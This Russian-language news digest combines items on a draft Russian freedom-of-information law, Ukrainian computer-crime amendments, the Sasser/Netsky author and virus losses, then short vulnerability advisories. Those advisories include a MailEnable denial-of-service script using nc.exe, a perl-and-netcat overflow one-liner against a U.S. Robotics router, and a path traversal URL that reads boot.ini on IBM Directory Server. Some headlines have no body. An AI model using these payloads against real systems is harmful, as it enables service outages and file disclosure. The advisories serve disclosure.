МЭРТ внес в правительство законопроект о доступе к информации о деятельности госорганов

Минэкономразвития внесло в правительство проект закона "Об обеспечении доступа граждан и организаций к информации о деятельности государственных органов и органов местного самоуправления", сообщили "Интерфаксу" в пресс-службе министерства.

В настоящее время в российском законодательстве нет нормативного правового акта о механизме реализации права свободно искать и получать информацию о деятельности госорганов, говорится в материалах МЭРТ, размещенных на сайте министерства.

Законопроект устанавливает единый порядок предоставления государственными органами и органами местного самоуправления информации о своей деятельности. Принцип открытости информации о деятельности госорганов означает презумпцию открытости информации, за исключением информации с ограниченным доступом, к которой относятся сведения, отнесенные в установленном порядке к государственной тайне, и конфиденциальная информация.

Категории сведений о деятельности госорганов, относимых к служебной тайне, а также порядок отнесения указанных сведений к служебной тайне будут урегулированы федеральным законом о служебной тайне, проект которого разрабатывается МЭРТ.

Доступ к информации обеспечивается путем обнародования госорганами информации о своей деятельности; размещения информации в информационных системах общего пользования; ознакомления пользователей информации с документами госорганов и органов местного самоуправления; обеспечения доступа пользователей информации на заседания госорганов; получения пользователями информации по запросу. В законопроекте устанавливается, что информация о деятельности госорганов может быть предоставлена бесплатно или за плату.

Бесплатно предоставляется информация, предоставляемая в устной форме; информация, обязательная для размещения в информационных системах общего пользования; иная информация, определенная законодательством РФ, нормативными правовыми актами субъектов РФ и органов местного самоуправления.

В оплату информационных услуг, предоставляемых госорганами, входят расходы на тиражирование и доставку информации, а также затраты на поиск и создание информации по запросу пользователя. Функции контроля за соблюдением права на доступ к информации из государственных и муниципальных информационных ресурсов возлагаются на уполномоченных должностных лиц госорганов и органов местного самоуправления.

Компьютерная преступность: изменения в Уголовном кодексе Украины

Законом Украины «О внесении изменений в Уголовный кодекс Украины по поводу ответственности за незаконное вмешательство в работу сетей электросвязи» от 05.06.2003г. внесены изменения и дополнения в раздел XVI УК Украины. В соответствии с внесенными изменениями название раздела XVI УК Украины сформулировано таким образом: «Преступления в сфере использования электронно-вычислительных машин (компьютеров), систем и компьютерных сетей и сетей электросвязи», название статьи 361 УК Украины изменилось соответственно на: «Незаконное вмешательство в работу электронно-вычислительных машин (компьютеров), систем и компьютерных сетей и сетей электросвязи». Кроме того, законодателем дополнена диспозиция этой нормы, где в качестве альтернативного деяния объективной стороны этого преступления предусмотрено незаконное вмешательство в работу сетей электросвязи, что привело к уничтожению, искажению, блокированию информации или к нарушению установленного порядка ее маршрутизации.

Анализ указанного закона позволяет сделать следующие выводы:
- расширен объем общественных отношений, охраняемых разделом XVI и ст. 361 УК Украины;
- предусмотрен новый вид предмета незаконного вмешательства – информация, передаваемая по сетям связи;
- предусмотрена новая форма объективной стороны незаконного вмешательства;
- дополнено альтернативное наказание за совершение квалифицированного незаконного вмешательства;
- определено понятие “существенный вред”, которое в предыдущей редакции было оценочным.

Новая редакция названия раздела позволяет сделать вывод о том, что сейчас к родовому объекту преступлений в сфере использования компьютерной техники относятся и информационные общественные отношения, средством обеспечения которых являются сети электросвязи. Содержание этих отношений состоит в предоставлении и получении услуг святи, то есть использовании сетей электросвязи с целью передачи или приема информации.

Изменения в редакции ст. 361 УК обусловили также появление новых характеристик непосредственного объекта незаконного вмешательства. Таким в предыдущей редакции ст.361 была структурно организованная и нормативно уреґулированная система социально значимых отношений собственности на компьютерную информацию, которая обеспечивает свободу реализации права каждого участника на удовлетворение информационной потребности и находится под охраной криминального закона. Новая редакция анализируемой статьи дает основание утверждать, что, кроме права собственности на компьютерную информацию, ею охраняются и общественные отношения предоставления и получения услуг электрической связи.


Подробнее : http://www.crime-research.ru/articles/Karchevski/

70% вирусной активности - дело рук одного подростка

Компания Sophos представила новый отчет о вирусной активности, отмеченной в первые шесть месяцев этого года. Согласно приведенным отчета, 70% всей вирусной активности и спама, от которых страдало в первой половине 2004 года все человечество, являются в конечном итоге делом рук одного-единственного 18-летнего юноши.

Специалисты Sophos зарегистрировали в первом полугодии 4677 новых вирусов. Это на 21% больше, чем за тот же период прошлого года. Но самый удивительный вывод - 70% всей вирусной активности, отмеченной компанией, являются делом рук одного человека - подростка из тихой немецкой деревушки.

18-летний Свен Яшан (Sven Jaschan) признался в том, что он является автором червей Netsky и Sasser, от которых страдали пользователи Сети на протяжении первых шести месяцев этого года. Два "произведения" Яшана - печально знаменитые черви Sasser и Netsky-P - в общей сложности ответственны за 50% всей вирусной активности, отмеченной компанией Sophos. Если принять во внимание различные виды червя Netsky, то этот показатель возрастет до 70%.

"То, что всего один немецкий подросток оказал такое воздействие на компьютерную безопасность, поражает, - заявил Грэхем Клули (Graham Cluley), старший технологический консультант компании Sophos. - Если бы один из его друзей не выдал его Microsoft, ситуация могла бы стать еще хуже".

Яшан был арестован в своем доме, в тихой немецкой деревушке Ваффенсен 7 мая этого года не без помощи, оказанной властям Германии компанией Microsoft. Хоть Свен Яшан и попал за решетку, его дело живет, и созданные им вирусы продолжают поражать компьютеры по всему миру.

По данным Sophos, не исключена вероятность того, что вслед за Яшаном обвинения будут предъявлены его друзьям по колледжу, которые, возможно, помогали ему писать и распространять вирусы.

В операционной системе Linux нарушено 283 патента?

Убытки от компьютерных вирусов в Украине увеличились на 30%

C каждым годом компьютерные вирусы наносят все больше убытков экономике развитых стран. Не обошла эта участь и Украину. По мнению экспертов, ущерб украинских предприятий составил 290 миллионов гривен, или 54 миллиона долларов. Причем за год убытки увеличились на 30 процентов.

Наибольший урон был нанесен Интернет-червями, лидерами среди которых стали почтовые вирусы, а также сетевые черви. Более "скромными" оказались "троянские" программы, лидером среди которых стали вирусы семейства "Бэкдор" (Backdoor.Agobot). Эти вирусы обладают широким набором вредоносных функций, включая различные методы кражи информации, противодействие антивирусным программам и межсетевым экранам. Кроме того, используя специальные технологии, они могут обходить защиту межсетевых экранов и отправлять конфиденциальную информацию их владельцам.

Стоит признать, что убытки отечественных компаний сравнительно невелики. Ущерб крупнейших зарубежных предприятий от вирусов, спама и хакерских атак только за последние два года превысил 80 миллиардов долларов и, по прогнозам экспертов, только за этот год составят аналогичную сумму.

МЭРТ готовит законопроекты об информационной открытости и персональных данных.

В Минэкономразвития РФ рассчитывают, что законопроект "Об обеспечении доступа граждан и организаций к информации о деятельности государственных органов и органов местного самоуправления" будет рассмотрен правительством на одном из заседаний осенью этого года.

Как сообщил представитель Минэкономразвития, правительственная комиссия под председательством вице-премьера РФ Александра Жукова поручила министерству согласовать этот законопроект со всеми органами власти. Он пояснил, что в настоящее время существует дискуссия по предмету действия этого законопроекта. В частности, по его словам, есть мнение, что действие законопроекта должно распространяться только на исполнительную власть, а позиция Минэкономразвития заключается в том, что этот закон должен быть общим для всех органов власти без исключения, в том числе законодательной, судебной и других. В связи с этим представитель министерства сообщил, что Минэкономразвития уже направило на согласование этот законопроект во все органы государственной власти.

"После согласования рассмотрим этот законопроект на правительстве. Надеюсь, что правительство рассмотрит и одобрит его уже осенью", – сказал представитель Минэкономразвития. При этом он выразил мнение, что "при хорошем раскладе этот законопроект может вступить в силу уже летом следующего года".

Представитель Минэкономразвития напомнил, что ключевой принцип этого законопроекта заключается в том, что "вся незакрытая информация, то есть не носящая конфиденциального характера или не содержащая государственной тайны, является открытой". При этом случаи, когда чиновники смогут закрыть информацию, будут описаны специальным законом о конфиденциальной информации, который также уже разработан Минэкономразвития. В основу закона о конфиденциальной информации, по словам представителя министерства, будет положен так называемый, "тест ущерба", а именно информация будет закрываться в том случае, если ее раскрытие может нанести больший ущерб для общества, чем закрытие. Жесткого же списка в отношении конфиденциальной информации не предполагается.

Касаясь закона об информационной открытости, представитель Минэкономразвития также отметил, что информацию граждане смогут получать анонимно, то есть в запросе не нужно будет указывать свои персональные данные, кроме ситуации, когда запрашиваются именно персональные данные о себе. Кроме того, в запросе не нужно будет обосновывать причины предоставления информации, то есть чиновники не смогут требовать обоснования запроса. Кроме того, в законопроекте будет перечислен перечень информации, обязательной для размещения, который включает в себя 37 позиций, в частности, нормативно-правовые акты, планы деятельности ведомств, всю информацию, связанную с госзакупками.

Касаясь вопроса о платности информации, представитель Минэкономразвития отметил, что "сама информация бесплатна, а государство никакого бизнеса на информации не делает". По его словам, плата может взиматься за тиражирование в печатном виде и доставку информации. При этом тиражирование небольшого объема информации – до 24 страниц – предполагается сделать также бесплатным.

Кроме того, источник сообщил, что Минэкономразвития разработает законопроект о персональных данных, в котором будут урегулированы все вопросы, связанные со сбором персональной информации всеми государственными органами. В этом законопроекте предполагается прописать все виды баз данных, которые имеют право вести госорганы. Кроме того, будет жестко регламентирован объем сведений, заносимых в эти базы данных. При этом, по его словам, человек будет иметь право запрашивать у всех ведомств всю информацию, накопленную о нем. Активную работу над этим законопроектом Минэкономразвития начнет в 2005 году.

Удаленный отказ в обслуживании в Webbsyte Chat

Программа: Webbsyte Chat 0.9.0 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость в Webbsyte Chat позволяет удаленному пользователю аварийно завершить работу службы. Служба не достаточно обрабатывает сырые подключения. Удаленный пользователь может установить 40 подключений к целевому chat серверу чтобы аварийно завершить работу службы со следующей ошибкой: "Run-time error '40006': Wrong protocol or connection state for the requested transaction or request" URL производителя: http://sourceforge.net/projects/wchat/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленный отказ в обслуживании в MailEnable Professional

Программа: MailEnable Professional 1.19 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость в MailEnable Professional позволяет удаленному пользователю вызвать отказ в обслуживании против HTTPMail службы. Удаленный пользователь может подключится к Webmail службе на 8080 порту и послать специально сформированный HTTP Get запрос, чтобы вызвать условия отказа в обслуживании на целевой системе. Пример/Эксплоит: @echo off ;if '%1'=='' echo Usage:%0 target [port]&&goto :eof ;set PORT=8080 ;if not '%2'=='' set PORT=%2 ;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof ;DEBUG < %~s0 ;GOTO :run e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: " !DOS@length>0x64 f 120 183 39 e 184 "XXXX" 0d 0a 0d 0a rcx 8c nhttp.tmp URL производителя: http://www.mailenable.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Отказ в обслуживании в Windows Remote Desktop службе в Windows XP и Windows 2003

Программа: Windows Remote Desktop Опасность: СРЕДНЯЯ Наличие эксплоита: Да Описание: Отказ в обслуживании обнаружен в Windows Remote Desktop службе в Windows XP и Windows 2003 позволяет удаленному пользователю в некоторых случаях аварийно завершить работу службы. На некоторых системах, в которых включен Remote Desktop, удаленный пользователь может нажать Windows клавишу и "U" клавишу одновременно и непрерывно в диалоге входа в систему, чтобы аварийно завершить работу целевой системы. Эта последовательность заставляет целевую систему постоянно загружать Windows utility manager, которая закрывает окно программы, если запущена еще одна копия программы. Однако, в некоторых системах, Windows utility manager может быть загружен более быстрее, чем копии будут закрываться, в результате заставляя Windows использовать всю доступную память. URL производителя: http://www.microsoft.com/technet/security/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Отказ в обслуживании в U.S. Robotics wireless router

bash ~ $ perl -e '$a = "GET / " . "A"x250 . "\r\n\r\n" ; print $a' | nc ap 80

Отказ в обслуживании в проверке X.509 сертификатов

Программа: GnuTLS 1.06 и более ранние версии Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость в GnuTLS в проверке X.509 сертификатов позволяет удаленному пользователю вызвать условия отказа в обслуживании на целевой системе. Удаленный пользователь может сконструировать специально обработанную подпись сертификата используя RSA или DSA ключи, чтобы заставить систему использовать 100 CPU при попытке проверить цепочку сертификатов. URL производителя: http://www.gnutls.org/ Решение:Установите последнюю версию программы (1.07): http://www.gnu.org/software/gnutls/download.html

Просмотр произвольных файлов в IBM Directory Server в 'ldacgi.exe'

Программа: IBM Directory Server 4.1 и более ранние версии Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость в IBM Directory Server в 'ldacgi.exe' позволяет удаленному пользователю просматривать файлы на целевой системе с привилегиями Web сервера. Пример: http://myserver/ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=./././././boot.ini&Sub=LocalePath&LocalePath=enus1252 URL производителя: http://www.ibm.com/support/docview.wss?uid=isg1IR52692 Решение:Уязвимость устранена в 3.2.2 Fix Pack 4 (http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg24006917) и 4.1 Fix Pack 3. Дополнительная информация: http://www.ibm.com/support/docview.wss?uid=swg1IR53631 и http://www.ibm.com/support/doc view.wss?uid=isg1IR52692

Целочисленное переполнение буфера в Mozilla и Netscape в обработке SOAP XML параметров

Локальный доступ к VPN Shared Secret в SonicWALL Pro

Программа: SonicWALL Pro 300 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость в SonicWALL Pro позволяет локальному пользователю получить VPN ключ. "Tech Support Report" записывает текущую конфигурацию устройства, включая VPN Shared Secret, в файл. Локальный пользователь может заставить администратора сконструировать отчет, чтобы получить доступ к этому файлу. URL производителя: http://www.sonicwall.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.